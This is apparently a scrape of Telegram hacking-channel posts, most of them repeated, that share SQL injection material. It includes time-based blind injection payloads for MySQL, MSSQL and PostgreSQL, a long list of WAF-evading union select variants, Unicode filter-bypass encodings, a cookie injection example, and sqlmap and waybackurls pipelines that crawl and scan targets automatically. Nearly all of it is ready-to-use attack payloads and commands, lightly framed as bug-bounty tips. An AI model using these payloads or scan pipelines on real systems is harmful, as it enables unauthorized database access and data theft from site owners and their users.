آموزش Blind Sql injection در محیط Dvwa
#sql_injection #sql #dvwa
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
#sql_injection #sql #dvwa
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
XSS/WAF/SQL filter bypass.
#bypass #xss #waf #sql
——————
0Day.Today
@LearnExploit
@Tech_Army
< - %EF%BC%9C (\uff1c)
> - %EF%BC%9E (\uff1e)
\ - %EF%BC%BC (\uff3c)
/ - %EF%BC%8F (\uff0f)
' - %EF%BC%87 (\uff07)
" - %EF%BC%82 (\uff02)
#bypass #xss #waf #sql
——————
0Day.Today
@LearnExploit
@Tech_Army
SQL injection payload :
——————
0Day.Today
@LearnExploit
@Tech_Army
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'
#payload #SQL ——————
0Day.Today
@LearnExploit
@Tech_Army
Advanced SQL Injection Cheatsheet - A cheat sheet that contains advanced queries for SQL Injection of all types
Github
#SQL
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#SQL
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - kleiton0x00/Advanced-SQL-Injection-Cheatsheet: A cheat sheet that contains advanced queries for SQL Injection of all types.
A cheat sheet that contains advanced queries for SQL Injection of all types. - kleiton0x00/Advanced-SQL-Injection-Cheatsheet
Time sleep sql injection ⚡️
Payload:
#sql #sql_injection #payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload:
'XOR(if(now()=sysdate(),sleep(33),0))OR'
#sql #sql_injection #payload
——————
0Day.Today
@LearnExploit
@Tech_Army
sql injection payload
#sql #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
14)%20AND%20(SELECT%207415%20FROM%20(SELECT(SLEEP(10)))CwkU)%20AND%20(7515=7515
#sql #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
SQL Injection
#sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
GET
/0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z/Folder/
HTTP/1.1
#sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
Sql Injection Payload
Payload :
#Payload #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload :
0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z
#Payload #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
Blind SQL Injection payload
#Sql #sql_injection #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
if(now()=sysdate()%2Csleep(10)%2C0)
#Sql #sql_injection #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
7 SQLs
4 in php
1 in aspx
2 in graphql
#SQL #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
4 in php
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
1 in aspx
orwa';%20waitfor%20delay%20'0:0:6'%20--%20
2 in graphql
orwa') OR 11=(SELECT 11 FROM PG_SLEEP(6))--
#SQL #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
Found SQL Injection in [org_id] Cookie
Payloads for Testing:
Injected in request like this
#BugBounty #Tips #SQL
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
Payloads for Testing:
-1 OR 0=6 AND 0-0=> FALSE
-1 OR 6=6 AND 0-0=> TRUE
Injected in request like this
Cookie:organization_id=-1%20OR%200%3D6%20AND%200-0
#BugBounty #Tips #SQL
Please open Telegram to view this post
VIEW IN TELEGRAM
Bypass SQL union select
#Bypass #SQL
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+
#Bypass #SQL
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
SQL Injection
After this, I used ghauri to extract the database It was successful
#SQL #Injection #ghauri #BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
After this, I used ghauri to extract the database It was successful
-11+PROCEDURE+ANALYSE(EXTRACTVALUE(9859,CONCAT(0x5c,(BENCHMARK(110000000,MD5(0x7562756f))))),1)--
#SQL #Injection #ghauri #BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
SQLMap from Waybackurls ⚡️
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"
#sql #sql_injection #tip
——————
0Day.Today
@LearnExploit
@Tech_Army
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"
#sql #sql_injection #tip
——————
0Day.Today
@LearnExploit
@Tech_Army
Do you know that sqlmap has its own crawler? Run in the background easily:
sqlmap -u 'https://target\.com' --crawl=3 --random-agent --batch --forms --threads=5 --hostname --timeout=15 --retries=1 --time-sec 12
#sql #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
sqlmap -u 'https://target\.com' --crawl=3 --random-agent --batch --forms --threads=5 --hostname --timeout=15 --retries=1 --time-sec 12
#sql #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
Sql Injection
Payload :
Parameter:
#BugBounty #Tips #sql_injection
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Payload :
-10'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z
Parameter:
cart/-10+payload
#BugBounty #Tips #sql_injection
Please open Telegram to view this post
VIEW IN TELEGRAM
Sql injection Manual Bypass WAF
Payload :
'AND+0+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+-
#sql_injection #Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload :
'AND+0+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+-
#sql_injection #Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
Time based SQL Injection using waybackurls
waybackurls TARGET.COM | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt
#sql_injection #sql #tip
——————
0Day.Today
@LearnExploit
@Tech_Army
waybackurls TARGET.COM | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt
#sql_injection #sql #tip
——————
0Day.Today
@LearnExploit
@Tech_Army